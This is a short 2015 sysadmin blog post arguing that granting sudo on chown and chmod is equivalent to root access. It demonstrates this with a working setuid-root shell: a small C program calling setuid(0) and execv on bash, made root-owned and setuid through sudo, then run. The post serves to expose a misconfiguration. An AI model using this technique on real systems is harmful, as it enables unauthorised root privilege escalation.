Archive for the ‘chown’ Tag

Privilege Escalation – be slack and pay for it   4 comments

My predecessor(s) had left a bunch of people at my work place (not even developers) with sudo access to chown and chmod – for the purpose of data management. For a while I had tried to explain that having sudo access to just those two commands is effectively having full root access on the machines.

I had to demonstrate it. So I did:

cat <<EOF >> make-me-root.c
#include <unistd.h>
int main() {
    setuid(0);
    execv("/bin/bash", NULL);
    return 0;
}
EOF

gcc -o make-me-root make-me-root.c
sudo chown root make-me-root
sudo chmod u+s make-me-root

./make-me-root

Alright, demonstrated. Now it’s time for the raising eyebrows to follow.

And now also comes the part where I know it’s almost impossible to revoke privileges from people after they got used to a broken workflow.

Advertisements

Posted January 30, 2015 by malkodan in Linux

Tagged with , , ,